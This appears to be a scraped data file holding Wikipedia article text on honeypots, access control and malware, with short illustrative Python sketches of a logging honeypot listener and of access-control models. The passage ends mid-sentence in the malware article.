423 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Honeypot_(computing) | In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data (for example, in a network site) that appears to be a legitimate part of the site which contains information or resources of value to attackers. It is actually isolated, monitored, and capable of blocking or analyzing the attackers. This is similar to police sting operations, colloquially known as "baiting" a suspect. 1 The main use for this network decoy is to distract potential attackers from more important information and machines on the real network, learn about the forms of attacks they can suffer, and examine such attacks during and after the exploitation of a honeypot. It provides a way to prevent and see vulnerabilities in a specific network system. A honeypot is a decoy used to protect a network from present or future attacks. 2 3 Honeypots derive their value from the use by attackers. If not interacted with, the honeypot has little to no value. Honeypots can be used for everything from slowing down or stopping automated attacks, capturing new exploits, to gathering intelligence on emerging threats or early warning and prediction. 4 Honeypots can be differentiated based on if they are physical or virtual: 2 3 Honeypots can be classified based on their deployment (use action) and based on their level of involvement. Based on deployment, honeypots may be classified as: 5 Production honeypots are easy to use, capture only limited information, and are used primarily by corporations. Production honeypots are placed inside the production network with other production servers by an organization to improve their overall state of security. Normally, production honeypots are low-interaction honeypots, which are easier to deploy. They give less information about the attacks or attackers than research honeypots. 5 Research honeypots are run to gather information about the motives and tactics of the black hat community targeting different networks. These honeypots do not add direct value to a specific organization; instead, they are used to research the threats that organizations face and to learn how to better protect against those threats. 6 Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations. 7 Based on design criteria, honeypots can be classified as: 5 Pure honeypots are full-fledged production systems. The activities of the attacker are monitored by using a bug tap that has been installed on the honeypot's link to the network. No other software needs to be installed. Even though a pure honeypot is useful, stealthiness of the defense mechanisms can be ensured by a more controlled mechanism. High-interaction honeypots imitate the activities of the production systems that host a variety of services and, therefore, an attacker may be allowed a lot of services to waste their time. By employing virtual machines, multiple honeypots can be hosted on a single physical machine. Therefore, even if the honeypot is compromised, it can be restored more quickly. In general, high-interaction honeypots provide more security by being difficult to detect, but they are expensive to maintain. 
If virtual machines are not available, one physical computer must be maintained for each honeypot, which can be exorbitantly expensive. Example: Honeynet. Low-interaction honeypots simulate only the services frequently requested by attackers. 8 Since they consume relatively few resources, multiple virtual machines can easily be hosted on one physical system, the virtual systems have a short response time, and less code is required, reducing the complexity of the virtual system's security. Example: Honeyd. This type of honeypot was one of the first types being created in the late nineties and was mainly used for detecting attacks, not studying them. 9 Sugarcane is a type of honeypot that masquerades as an open proxy. 10 It can often take form as a server designed to look like a misconfigured HTTP proxy. 11 Probably the most famous open proxy was the default configuration of sendmail (before version 8.9.0 in 1998) which would forward email to and from any destination. 12 Recently, a new market segment called deception technology has emerged using basic honeypot technology with the addition of advanced automation for scale. Deception technology addresses the automated deployment of honeypot resources over a large commercial enterprise or government institution. 13 Malware honeypots are a decoy designed to intentionally attract malicious software. It does this by imitating a vulnerable system or network, such as a web server. The honeypot is intentionally set up with security flaws that look to invite these malware attacks. Once attacked IT teams can then analyze the malware to better understand where it comes from and how it acts. 14 Spammers abuse vulnerable resources such as open mail relays and open proxies. These are servers which accept e-mail from anyone on the Internet—including spammers—and send it to its destination. Some system administrators have created honeypot programs that masquerade as these abusable resources to discover spammer activity. There are several capabilities such honeypots provide to these administrators, and the existence of such fake abusable systems makes abuse more difficult or risky. Honeypots can be a powerful countermeasure to abuse from those who rely on very high volume abuse (e.g., spammers). These honeypots can reveal the abuser's IP address and provide bulk spam capture (which enables operators to determine spammers' URLs and response mechanisms). As described by M. Edwards at ITPRo Today: Typically, spammers test a mail server for open relaying by simply sending themselves an email message. If the spammer receives the email message, the mail server obviously allows open relaying. Honeypot operators, however, can use the relay test to thwart spammers. The honeypot catches the relay test email message, returns the test email message, and subsequently blocks all other email messages from that spammer. Spammers continue to use the antispam honeypot for spamming, but the spam is never delivered. Meanwhile, the honeypot operator can notify spammers' ISPs and have their Internet accounts canceled. If honeypot operators detect spammers who use open-proxy servers, they can also notify the proxy server operator to lock down the server to prevent further misuse. 15 The apparent source may be another abused system. Spammers and other abusers may use a chain of such abused systems to make detection of the original starting point of the abuse traffic difficult. This in itself is indicative of the power of honeypots as anti-spam tools. 
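Purely as an illustration of the low-interaction idea described above, the sketch below listens on one arbitrary port, sends a fake banner, and logs whatever the client sends. It is a toy, not a hardened honeypot such as Honeyd or Conpot; the port number and banner string are invented.
import socket
import datetime

# Minimal low-interaction "honeypot" sketch: listen on one port, log every
# connection attempt with a timestamp, send a fake banner, and close.
HOST, PORT = "0.0.0.0", 2222          # arbitrary port pretending to be a service
BANNER = b"SSH-2.0-OpenSSH_7.4\r\n"   # fake banner; contents are arbitrary

def run_once():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, PORT))
        srv.listen(1)
        conn, addr = srv.accept()
        with conn:
            conn.sendall(BANNER)
            data = conn.recv(1024)    # whatever the client sends first
            stamp = datetime.datetime.utcnow().isoformat()
            print(f"{stamp} connection from {addr[0]}:{addr[1]} sent {data!r}")

if __name__ == "__main__":
    run_once()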
In the early days of anti-spam honeypots, spammers, with little concern for hiding their location, felt safe testing for vulnerabilities and sending spam directly from their own systems. Honeypots made the abuse riskier and more difficult. Spam still flows through open relays, but the volume is much smaller than in 2001-02. While most spam originates in the U.S., 16 spammers hop through open relays across political boundaries to mask their origin. Honeypot operators may use intercepted relay tests to recognize and thwart attempts to relay spam through their honeypots. "Thwart" may mean "accept the relay spam but decline to deliver it". Honeypot operators may discover other details concerning the spam and the spammer by examining the captured spam messages. Open-relay honeypots include Jackpot, written in Java by Jack Cleaver; smtpot.py, written in Python by Karl A. Krueger; 17 and spamhole, written in C. 18 The Bubblegum Proxypot is an open-source honeypot (or "proxypot"). 19 An email address that is not used for any other purpose than to receive spam can also be considered a spam honeypot. Compared with the term "spamtrap", the term "honeypot" might be more suitable for systems and techniques that are used to detect or counterattack probes. With a spamtrap, spam arrives at its destination "legitimately"—exactly as non-spam email would arrive. An amalgam of these techniques is Project Honey Pot, a distributed, open source project that uses honeypot pages installed on websites around the world. These honeypot pages disseminate uniquely tagged spamtrap email addresses and spammers can then be tracked—the corresponding spam mail is subsequently sent to these spamtrap e-mail addresses. 20 Databases often get attacked by intruders using SQL injection. As such activities are not recognized by basic firewalls, companies often use database firewalls for protection. Some of the available SQL database firewalls provide support for honeypot architectures so that the intruder runs against a trap database while the web application remains functional. 21 Industrial Control Systems (ICS) are often the target of cyberattacks. 22 One of the main targets within ICS are Programmable Logic Controllers. 23 In order to understand intruders' techniques in this context, several honeypots have been proposed. Conpot 24 25 is a low-interaction honeypot capable of simulating Siemens PLCs. HoneyPLC is a medium-interaction honeypot that can simulate Siemens, Rockwell and other PLC brands. 26 27 Just as honeypots are weapons against spammers, honeypot detection systems are spammer-employed counter-weapons. As detection systems would likely use unique characteristics of specific honeypots to identify them, such as the property-value pairs of default honeypot configuration, 28 many honeypots in use utilise a set of unique characteristics larger and more daunting to those seeking to detect and thereby identify them. This is an unusual circumstance in software; a situation in which "versionitis" (a large number of versions of the same software, all differing slightly from each other) can be beneficial. There's also an advantage in having some easy-to-detect honeypots deployed. Fred Cohen, the inventor of the Deception Toolkit, argues that every system running his honeypot should have a deception port which adversaries can use to detect the honeypot. 29 Cohen believes that this might deter adversaries. Honeypots also allow for early detection of legitimate threats.
No matter how the honeypot detects the exploit, it can alert you immediately to the attempted attack. 30 The goal of honeypots is to attract and engage attackers for a sufficiently long period to obtain high-level Indicators of Compromise (IoC) such as attack tools and Tactics, Techniques, and Procedures (TTPs). Thus, a honeypot needs to emulate essential services in the production network and grant the attacker the freedom to perform adversarial activities to increase its attractiveness to the attacker. Although the honeypot is a controlled environment and can be monitored by using tools such as honeywall, 31 attackers may still be able to use some honeypots as pivot nodes to penetrate production systems. 32 The second risk of honeypots is that they may attract legitimate users due to a lack of communication in large-scale enterprise networks. For example, the security team who applies and monitors the honeypot may not disclose the honeypot location to all users in time due to the lack of communication or the prevention of insider threats. 33 34 "A 'honey net' is a network of high interaction honeypots that simulates a production network and configured such that all activity is monitored, recorded and in a degree, discreetly regulated. -Lance Spitzner, Honeynet Project Two or more honeypots on a network form a honey net. Typically, a honey net is used for monitoring a larger and or more diverse network in which one honeypot may not be sufficient. Honey nets and honeypots are usually implemented as parts of larger network intrusion detection systems. A honey farm is a centralized collection of honeypots and analysis tools. 35 The concept of the honey net first began in 1999 when Lance Spitzner, founder of the Honeynet Project, published the paper "To Build a Honeypot". 36 An early formulation of the concept, called "entrapment", is defined in FIPS 39 (1976) as "the deliberate planting of apparent flaws in a system for the purpose of detecting attempted penetrations or confusing an intruder about which flaws to exploit". 37 The earliest honeypot techniques are described in Clifford Stoll's 1989 book The Cuckoo's Egg. One of the earliest documented cases of the cybersecurity use of a honeypot began in January 1991. On January 7, 1991, while he worked at AT T Bell Laboratories Cheswick observed a criminal hacker, known as a cracker, attempting to obtain a copy of a password file. Cheswick wrote that he and colleagues constructed a "chroot "Jail" (or "roach motel") which allowed them to observe their attacker over a period of several months. 38 In 2017, Dutch police used honeypot techniques to track down users of the darknet market Hansa. The metaphor of a bear being attracted to and stealing honey is common in many traditions, including Germanic, Celtic, and Slavic. A common Slavic word for the bear is medved "honey eater". The tradition of bears stealing honey has been passed down through stories and folklore, especially the well known Winnie the Pooh. 39 40 |
424 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_access_control | In computer security, general access control includes identification, authorization, authentication, access approval, and audit. A more narrow definition of access control would cover only access approval, whereby the system makes a decision to grant or reject an access request from an already authenticated subject, based on what the subject is authorized to access. Authentication and access control are often combined into a single operation, so that access is approved based on successful authentication, or based on an anonymous access token. Authentication methods and tokens include passwords, biometric scans, physical keys, electronic keys and devices, hidden paths, social barriers, and monitoring by humans and automated systems. citation needed In any access-control model, the entities that can perform actions on the system are called subjects, and the entities representing resources to which access may need to be controlled are called objects (see also Access Control Matrix). Subjects and objects should both be considered as software entities, rather than as human users: any human users can only have an effect on the system via the software entities that they control. citation needed Although some systems equate subjects with user IDs, so that all processes started by a user by default have the same authority, this level of control is not fine-grained enough to satisfy the principle of least privilege, and arguably is responsible for the prevalence of malware in such systems (see computer insecurity). citation needed In some models, for example the object-capability model, any software entity can potentially act as both subject and object. citation needed As of 2014 update , access-control models tend to fall into one of two classes: those based on capabilities and those based on access control lists (ACLs). Both capability-based and ACL-based models have mechanisms to allow access rights to be granted to all members of a group of subjects (often the group is itself modeled as a subject). citation needed Access control systems provide the essential services of authorization, identification and authentication (I A), access approval, and accountability where: citation needed Authorization involves the act of defining access-rights for subjects. An authorization policy specifies the operations that subjects are allowed to execute within a system. citation needed Most modern operating systems implement authorization policies as formal sets of permissions that are variations or extensions of three basic types of access: citation needed These rights and permissions are implemented differently in systems based on discretionary access control (DAC) and mandatory access control (MAC). Identification and authentication (I A) is the process of verifying that an identity is bound to the entity that makes an assertion or claim of identity. The I A process assumes that there was an initial validation of the identity, commonly called identity proofing. Various methods of identity proofing are available, ranging from in-person validation using government issued identification, to anonymous methods that allow the claimant to remain anonymous, but known to the system if they return. The method used for identity proofing and validation should provide an assurance level commensurate with the intended use of the identity within the system. 
Subsequently, the entity asserts an identity together with an authenticator as a means for validation. The only requirements for the identifier is that it must be unique within its security domain. citation needed Authenticators are commonly based on at least one of the following four factors: citation needed Access approval is the function that actually grants or rejects access during operations. 1 During access approval, the system compares the formal representation of the authorization policy with the access request, to determine whether the request shall be granted or rejected. Moreover, the access evaluation can be done online ongoing. 2 Accountability uses such system components as audit trails (records) and logs, to associate a subject with its actions. The information recorded should be sufficient to map the subject to a controlling user. Audit trails and logs are important for citation needed If no one is regularly reviewing your logs and they are not maintained in a secure and consistent manner, they may not be admissible as evidence. citation needed Many systems can generate automated reports, based on certain predefined criteria or thresholds, known as clipping levels. For example, a clipping level may be set to generate a report for the following: citation needed These reports help a system administrator or security administrator to more easily identify possible break-in attempts. Definition of clipping level: 3 a disk's ability to maintain its magnetic properties and hold its content. A high-quality level range is 65 70%; low quality is below 55%. Access control models are sometimes categorized as either discretionary or non-discretionary. The three most widely recognized models are Discretionary Access Control (DAC), Mandatory Access Control (MAC), and Role Based Access Control (RBAC). MAC is non-discretionary. citation needed Discretionary access control (DAC) is a policy determined by the owner of an object. The owner decides who is allowed to access the object, and what privileges they have. Two important concepts in DAC are citation needed Access controls may be discretionary in ACL-based or capability-based access control systems. (In capability-based systems, there is usually no explicit concept of 'owner', but the creator of an object has a similar degree of control over its access policy.) Mandatory access control refers to allowing access to a resource if and only if rules exist that allow a given user to access the resource. It is difficult to manage, but its use is usually justified when used to protect highly sensitive information. Examples include certain government and military information. Management is often simplified (over what is required) if the information can be protected using hierarchical access control, or by implementing sensitivity labels. What makes the method "mandatory" is the use of either rules or sensitivity labels. citation needed Two methods are commonly used for applying mandatory access control: citation needed Few systems implement MAC; XTS 400 and SELinux are examples of systems that do. Role-based access control (RBAC) is an access policy determined by the system, not by the owner. RBAC is used in commercial applications and also in military systems, where multi-level security requirements may also exist. RBAC differs from DAC in that DAC allows users to control access to their resources, while in RBAC, access is controlled at the system level, outside of the user's control. 
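A toy sketch of the discretionary model just described, in which the owner of each object manages its access control list and access approval consults that list. All subject, object and permission names below are invented for illustration.
# Toy discretionary access control (DAC): each object has an owner-managed
# ACL mapping subjects to the permissions they hold. Illustrative only.
acl = {
    "report.txt": {"owner": "alice",
                   "permissions": {"alice": {"read", "write"},
                                   "bob": {"read"}}},
}

def is_allowed(subject, obj, action):
    """Access approval: grant only if the object's ACL lists the permission."""
    entry = acl.get(obj)
    return bool(entry) and action in entry["permissions"].get(subject, set())

def grant(owner, subject, obj, action):
    """Discretionary grant: only the object's owner may extend its ACL."""
    entry = acl[obj]
    if owner != entry["owner"]:
        raise PermissionError("only the owner may change the ACL")
    entry["permissions"].setdefault(subject, set()).add(action)

print(is_allowed("bob", "report.txt", "write"))   # False
grant("alice", "bob", "report.txt", "write")      # owner delegates write access
print(is_allowed("bob", "report.txt", "write"))   # True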
Although RBAC is non-discretionary, it can be distinguished from MAC primarily in the way permissions are handled. MAC controls read and write permissions based on a user's clearance level and additional labels. RBAC controls collections of permissions that may include complex operations such as an e-commerce transaction, or may be as simple as read or write. A role in RBAC can be viewed as a set of permissions. Three primary rules are defined for RBAC: role assignment, role authorization, and permission authorization. Additional constraints may be applied as well, and roles can be combined in a hierarchy where higher-level roles subsume permissions owned by lower-level sub-roles. Most IT vendors offer RBAC in one or more products. In attribute-based access control (ABAC), 4 5 access is granted not based on the rights of the subject associated with a user after authentication, but based on the attributes of the subject, object, requested operations, and environment conditions against policy, rules, or relationships that describe the allowable operations for a given set of attributes. 6 The user has to prove so-called claims about his or her attributes to the access control engine. An attribute-based access control policy specifies which claims need to be satisfied in order to grant access to an object. For instance, the claim could be "older than 18". Any user that can prove this claim is granted access. Users can be anonymous when authentication and identification are not strictly required. One does, however, require means for proving claims anonymously. This can, for instance, be achieved using anonymous credentials. XACML (eXtensible Access Control Markup Language) is a standard for attribute-based access control. XACML 3.0 was standardized in January 2013. 7 Traditionally, access control has the purpose of restricting access, thus most access control models follow the "default deny principle", i.e. if a specific access request is not explicitly allowed, it will be denied. This behavior might conflict with the regular operations of a system. In certain situations, humans are willing to take the risk that might be involved in violating an access control policy, if the potential benefit that can be achieved outweighs this risk. This need is especially visible in the health-care domain, where denied access to patient records can cause the death of a patient. Break-glass (also called break-the-glass) approaches try to mitigate this by allowing users to override access control decisions. Break-glass can either be implemented in an access-control-specific manner (e.g. within RBAC), 8 or in a generic manner (i.e., independent of the underlying access control model). 9 The initialism HBAC stands for "host-based access control". 10 |
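To make the RBAC/ABAC contrast above concrete, here is a small hedged sketch: roles are treated as permission sets, and an ABAC decision evaluates a claim against the subject's attributes. The roles, permissions, and policy are invented for illustration.

# RBAC: a role is a named set of permissions assigned at the system level.
ROLES = {
    "cashier": {"read_price", "create_sale"},
    "manager": {"read_price", "create_sale", "issue_refund"},
}

def rbac_allowed(role, permission):
    return permission in ROLES.get(role, set())

# ABAC: access depends on whether the subject's attributes satisfy the policy,
# e.g. the claim "older than 18" from the text above.
def abac_allowed(attributes):
    return attributes.get("age", 0) > 18

print(rbac_allowed("cashier", "issue_refund"))  # False
print(abac_allowed({"age": 21}))                # True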
425 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Malware | Malware (a portmanteau of malicious software) 1 is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or which unknowingly interferes with the user's computer security and privacy. 1 2 3 4 5 Researchers tend to classify malware into one or more sub-types (i.e. computer viruses, worms, Trojan horses, ransomware, spyware, adware, rogue software, wipers and keyloggers). 1 Malware poses serious problems to individuals and businesses on the Internet. 6 7 According to Symantec's 2018 Internet Security Threat Report (ISTR), malware variants number has increased to 669,947,865 in 2017, which is twice as many malware variants as in 2016. 8 Cybercrime, which includes malware attacks as well as other crimes committed by computer, was predicted to cost the world economy US$6 trillion in 2021, and is increasing at a rate of 15% per year. 9 Since 2021, malware has been designed to target computer systems that run critical infrastructure such as the electricity distribution network. 10 The defense strategies against malware differ according to the type of malware but most can be thwarted by installing antivirus software, firewalls, applying regular patches, securing networks from intrusion, having regular backups and isolating infected systems. Malware can be designed to evade antivirus software detection algorithms. 8 The notion of a self-reproducing computer program can be traced back to initial theories about the operation of complex automata. 11 John von Neumann showed that in theory a program could reproduce itself. This constituted a plausibility result in computability theory. Fred Cohen experimented with computer viruses and confirmed Neumann's postulate and investigated other properties of malware such as detectability and self-obfuscation using rudimentary encryption. His 1987 doctoral dissertation was on the subject of computer viruses. 12 The combination of cryptographic technology as part of the payload of the virus, exploiting it for attack purposes was initialized and investigated from the mid 1990s, and includes initial ransomware and evasion ideas. 13 Before Internet access became widespread, viruses spread on personal computers by infecting executable programs or boot sectors of floppy disks. By inserting a copy of itself into the machine code instructions in these programs or boot sectors, a virus causes itself to be run whenever the program is run or the disk is booted. Early computer viruses were written for the Apple II and Mac, but they became more widespread with the dominance of the IBM PC and MS-DOS. The first IBM PC virus in the wild was a boot sector virus dubbed (c)Brain, created in 1986 by the Farooq Alvi brothers in Pakistan. 14 Malware distributors would trick the user into booting or running from an infected device or medium. For example, a virus could make an infected computer add autorunnable code to any USB stick plugged into it. Anyone who then attached the stick to another computer set to autorun from USB would in turn become infected, and also pass on the infection in the same way. 15 Older email software would automatically open HTML email containing potentially malicious JavaScript code. Users may also execute disguised malicious email attachments. 
The 2018 Data Breach Investigations Report by Verizon, cited by CSO Online, states that emails are the primary method of malware delivery, accounting for 96% of malware delivery around the world. 16 17 The first worms, network-borne infectious programs, originated not on personal computers, but on multitasking Unix systems. The first well-known worm was the Morris worm of 1988, which infected SunOS and VAX BSD systems. Unlike a virus, this worm did not insert itself into other programs. Instead, it exploited security holes (vulnerabilities) in network server programs and started itself running as a separate process. 18 This same behavior is used by today's worms as well. 19 With the rise of the Microsoft Windows platform in the 1990s, and the flexible macros of its applications, it became possible to write infectious code in the macro language of Microsoft Word and similar programs. These macro viruses infect documents and templates rather than applications (executables), but rely on the fact that macros in a Word document are a form of executable code. 20 Many early infectious programs, including the Morris Worm, the first internet worm, were written as experiments or pranks. 21 Today, malware is used by both black hat hackers and governments to steal personal, financial, or business information. 22 23 Today, any device that plugs into a USB port even lights, fans, speakers, toys, or peripherals such as a digital microscope can be used to spread malware. Devices can be infected during manufacturing or supply if quality control is inadequate. 15 Since the rise of widespread broadband Internet access, malicious software has more frequently been designed for profit. Since 2003, the majority of widespread viruses and worms have been designed to take control of users' computers for illicit purposes. 24 Infected "zombie computers" can be used to send email spam, to host contraband data such as child pornography, 25 or to engage in distributed denial-of-service attacks as a form of extortion. 26 Malware is used broadly against government or corporate websites to gather sensitive information, 27 or to disrupt their operation in general. Further, malware can be used against individuals to gain information such as personal identification numbers or details, bank or credit card numbers, and passwords. 28 29 In addition to criminal money-making, malware can be used for sabotage, often for political motives. Stuxnet, for example, was designed to disrupt very specific industrial equipment. There have been politically motivated attacks which spread over and shut down large computer networks, including massive deletion of files and corruption of master boot records, described as "computer killing. Such attacks were made on Sony Pictures Entertainment (25 November 2014, using malware known as Shamoon or W32.Disttrack) and Saudi Aramco (August 2012). 30 31 Malware can be classified in numerous ways, and certain malicious programs may fall into two or more categories simultaneously. 1 Broadly, software can categorised into three types: 32 (i) goodware; (ii) greyware and (iii) malware. A computer virus is software usually hidden within another seemingly innocuous program that can produce copies of itself and insert them into other programs or files, and that usually performs a harmful action (such as destroying data). 33 They have been likened to biological viruses. 
3 An example of this is a portable execution infection, a technique, usually used to spread malware, that inserts extra data or executable code into PE files. 34 A computer virus is software that embeds itself in some other executable software (including the operating system itself) on the target system without the user's knowledge and consent and when it is run, the virus is spread to other executable files. A worm is a stand-alone malware software that actively transmits itself over a network to infect other computers and can copy itself without infecting files. These definitions lead to the observation that a virus requires the user to run an infected software or operating system for the virus to spread, whereas a worm spreads itself. 35 Once malicious software is installed on a system, it is essential that it stays concealed, to avoid detection. Software packages known as rootkits allow this concealment, by modifying the host's operating system so that the malware is hidden from the user. Rootkits can prevent a harmful process from being visible in the system's list of processes, or keep its files from being read. 36 Some types of harmful software contain routines to evade identification and or removal attempts, not merely to hide themselves. An early example of this behavior is recorded in the Jargon File tale of a pair of programs infesting a Xerox CP-V time sharing system: Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently stopped program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system. 37 A backdoor is a broad term for a computer program that allows an attacker persistent unauthorised remote access to a victim's machine often without their knowledge. 38 The attacker typically uses another attack (such as a trojan, worm or virus) to bypass authentication mechanisms usually over an unsecured network such as the Internet to install the backdoor application. A backdoor can also be a side effect of a software bug in legitimate software that is exploited by an attacker to gain access to a victim's computer or network. The idea has often been suggested that computer manufacturers preinstall backdoors on their systems to provide technical support for customers, but this has never been reliably verified. It was reported in 2014 that US government agencies had been diverting computers purchased by those considered "targets" to secret workshops where software or hardware permitting remote access by the agency was installed, considered to be among the most productive operations to obtain access to networks around the world. 39 Backdoors may be installed by Trojan horses, worms, implants, or other methods. 40 41 A Trojan horse misrepresents itself to masquerade as a regular, benign program or utility in order to persuade a victim to install it. A Trojan horse usually carries a hidden destructive function that is activated when the application is started. The term is derived from the Ancient Greek story of the Trojan horse used to invade the city of Troy by stealth. 42 43 Trojan horses are generally spread by some form of social engineering, for example, where a user is duped into executing an email attachment disguised to be unsuspicious, (e.g., a routine form to be filled in), or by drive-by download. 
Although their payload can be anything, many modern forms act as a backdoor, contacting a controller (phoning home) which can then have unauthorized access to the affected computer, potentially installing additional software such as a keylogger to steal confidential information, cryptomining software or adware to generate revenue to the operator of the trojan. 44 While Trojan horses and backdoors are not easily detectable by themselves, computers may appear to run slower, emit more heat or fan noise due to heavy processor or network usage, as may occur when cryptomining software is installed. Cryptominers may limit resource usage and or only run during idle times in an attempt to evade detection. Unlike computer viruses and worms, Trojan horses generally do not attempt to inject themselves into other files or otherwise propagate themselves. 45 In spring 2017, Mac users were hit by the new version of Proton Remote Access Trojan (RAT) 46 trained to extract password data from various sources, such as browser auto-fill data, the Mac-OS keychain, and password vaults. 47 Droppers are a sub-type of Trojans that solely aim to deliver malware upon the system that they infect with the desire to subvert detection through stealth and a light payload. 48 It is important not to confuse a dropper with a loader or stager. A loader or stager will merely load an extension of the malware (for example a collection of malicious functions through reflective dynamic link library injection) into memory. The purpose is to keep the initial stage light and undetectable. A dropper merely downloads further malware to the system. Ransomware prevents a user from accessing their files until a ransom is paid. There are two variations of ransomware, being crypto ransomware and locker ransomware. 49 Locker ransomware just locks down a computer system without encrypting its contents, whereas crypto ransomware locks down a system and encrypts its contents. For example, programs such as CryptoLocker encrypt files securely, and only decrypt them on payment of a substantial sum of money. 50 Lock-screens, or screen lockers is a type of "cyber police" ransomware that blocks screens on Windows or Android devices with a false accusation in harvesting illegal content, trying to scare the victims into paying up a fee. 51 Jisut and SLocker impact Android devices more than other lock-screens, with Jisut making up nearly 60 percent of all Android ransomware detections. 52 Encryption-based ransomware, like the name suggests, is a type of ransomware that encrypts all files on an infected machine. These types of malware then display a pop-up informing the user that their files have been encrypted and that they must pay (usually in Bitcoin) to recover them. Some examples of encryption-based ransomware are CryptoLocker and WannaCry. 53 Some malware is used to generate money by click fraud, making it appear that the computer user has clicked an advertising link on a site, generating a payment from the advertiser. It was estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and 22% of all ad-clicks were fraudulent. 54 Grayware is any unwanted application or file that can worsen the performance of computers and may cause security risks but which there is insufficient consensus or data to classify them as malware. 32 Types of greyware typically includes spyware, adware, fraudulent dialers, joke programs ("jokeware") and remote access tools. 
38 For example, at one point, Sony BMG compact discs silently installed a rootkit on purchasers' computers with the intention of preventing illicit copying. 55 Potentially unwanted programs (PUPs) are applications that would be considered unwanted despite often being intentionally downloaded by the user. 56 PUPs include spyware, adware, and fraudulent dialers. Many security products classify unauthorised key generators as PUPs, although they frequently carry true malware in addition to their ostensible purpose. 57 In fact, Kammerstetter et al. (2012) 57 estimated that as much as 55% of key generators could contain malware and that about 36% malicious key generators were not detected by antivirus software. Some types of adware turn off anti-malware and virus protection; technical remedies are available. 58 Programs designed to monitor users' web browsing, display unsolicited advertisements, or redirect affiliate marketing revenues are called spyware. Spyware programs do not spread like viruses; instead they are generally installed by exploiting security holes. They can also be hidden and packaged together with unrelated user-installed software. 59 The Sony BMG rootkit was intended to prevent illicit copying; but also reported on users' listening habits, and unintentionally created extra security vulnerabilities. 55 Antivirus software typically uses two techniques to detect malware: (i) static analysis and (ii) dynamic heuristic analysis. 60 Static analysis involves studying the software code of a potentially malicious program and producing a signature of that program. This information is then used to compare scanned files by an antivirus program. Because this approach is not useful for malware that has not yet been studied, antivirus software can use dynamic analysis to monitor how the program runs on a computer and block it if it performs unexpected activity. The aim of any malware is to conceal itself from detection by users or antivirus software. 1 Detecting potential malware is difficult for two reasons. The first is that it is difficult to determine if software is malicious. 32 The second is that malware uses technical measures to make it more difficult to detect it. 60 An estimated 33% of malware is not detected by antivirus software. 57 The most commonly employed anti-detection technique involves encrypting the malware payload in order to prevent antivirus software from recognizing the signature. 32 Tools such as crypters come with an encrypted blob of malicious code and a decryption stub. The stub decrypts the blob and loads it into memory. Because antivirus does not typically scan memory and only scans files on the drive, this allows the malware to evade detection. Advanced malware has the ability to transform itself into different variations, making it less likely to be detected due to the differences in its signatures. This is known as polymorphic malware. Other common techniques used to evade detection include, from common to uncommon: 61 (1) evasion of analysis and detection by fingerprinting the environment when executed; 62 (2) confusing automated tools' detection methods. This allows malware to avoid detection by technologies such as signature-based antivirus software by changing the server used by the malware; 61 (3) timing-based evasion. 
This is when malware runs at certain times or following certain actions taken by the user, so it executes during certain vulnerable periods, such as during the boot process, while remaining dormant the rest of the time; (4) obfuscating internal data so that automated tools do not detect the malware; 63 (v) information hiding techniques, namely stegomalware; 64 and (5) fileless malware which runs within memory instead of using files and utilizes existing system tools to carry out malicious acts. The use of existing binaries to carry out malicious activities is a technique known as LotL, or Living off the Land. 65 This reduces the amount of forensic artifacts available to analyze. Recently these types of attacks have become more frequent with a 432% increase in 2017 and makeup 35% of the attacks in 2018. Such attacks are not easy to perform but are becoming more prevalent with the help of exploit-kits. 66 67 A vulnerability is a weakness, flaw or software bug in an application, a complete computer, an operating system, or a computer network that is exploited by malware to bypass defences or gain privileges it requires to run. For example, TestDisk 6.4 or earlier contained a vulnerability that allowed attackers to inject code into Windows. 68 Malware can exploit security defects (security bugs or vulnerabilities) in the operating system, applications (such as browsers, e.g. older versions of Microsoft Internet Explorer supported by Windows XP 69 ), or in vulnerable versions of browser plugins such as Adobe Flash Player, Adobe Acrobat or Reader, or Java SE. 70 71 For example, a common method is exploitation of a buffer overrun vulnerability, where software designed to store data in a specified region of memory does not prevent more data than the buffer can accommodate from being supplied. Malware may provide data that overflows the buffer, with malicious executable code or data after the end; when this payload is accessed it does what the attacker, not the legitimate software, determines. Malware can exploit recently discovered vulnerabilities before developers have had time to release a suitable patch. 6 Even when new patches addressing the vulnerability have been released, they may not necessarily be installed immediately, allowing malware to take advantage of systems lacking patches. Sometimes even applying patches or installing new versions does not automatically uninstall the old versions. There are several ways the users can stay informed and protected from security vulnerabilities in software. Software providers often announce updates that address security issues. 72 Common vulnerabilities are assigned unique identifiers (CVE IDs) and listed in public databases like the National Vulnerability Database. Tools like Secunia PSI, 73 free for personal use, can scan a computer for outdated software with known vulnerabilities and attempt to update them. Firewalls and intrusion prevention systems can monitor the network traffic for suspicious activity that might indicate an attack. 74 Users and programs can be assigned more privileges than they require, and malware can take advantage of this. For example, of 940 Android apps sampled, one third of them asked for more privileges than they required. 75 Apps targeting the Android platform can be a major source of malware infection but one solution is to use third-party software to detect apps that have been assigned excessive privileges. 
76 Some systems allow all users to make changes to the core components or settings of the system, which is considered over-privileged access today. This was the standard operating procedure for early microcomputer and home computer systems, where there was no distinction between an administrator or root, and a regular user of the system. In some systems, non-administrator users are over-privileged by design, in the sense that they are allowed to modify internal structures of the system. In some environments, users are over-privileged because they have been inappropriately granted administrator or equivalent status. 77 This can be because users tend to demand more privileges than they need, so often end up being assigned unnecessary privileges. 78 Some systems allow code executed by a user to access all rights of that user, which is known as over-privileged code. This was also standard operating procedure for early microcomputer and home computer systems. Malware, running as over-privileged code, can use this privilege to subvert the system. Almost all currently popular operating systems, and also many scripting applications allow code too many privileges, usually in the sense that when a user executes code, the system allows that code all rights of that user. citation needed A credential attack occurs when a user account with administrative privileges is cracked and that account is used to provide malware with appropriate privileges. 79 Typically, the attack succeeds because the weakest form of account security is used, which is typically a short password that can be cracked using a dictionary or brute force attack. Using strong 